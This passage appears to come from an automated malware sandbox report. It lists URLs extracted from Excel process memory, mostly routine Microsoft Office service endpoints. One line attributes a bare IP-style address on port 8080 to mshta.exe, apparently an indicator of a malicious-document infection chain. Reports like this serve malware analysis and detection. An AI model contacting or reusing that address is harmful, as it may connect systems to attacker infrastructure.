      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://cr.office.com
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/H
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com4
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comB
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comz
      Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileI
      Source: EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://dev.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.ai-
      Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/a
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: EXCEL.EXE, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://devnull.onenote.com
      Source: EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comBearer
      Source: EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comt
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://directory.services.
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/=
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1U
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/E
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/v
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnostics.office.com4
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnosticssdf.office.comX
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechnWz
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: EXCEL.EXE, 00000000.00000002.629522370.0000000012CF0000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android?
      Source: mshta.exe, 00000015.00000002.616453866.000001E529C64000.00000004.00000020.sdmpString found in binary or memory: https://fs.230.250.107:8080/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
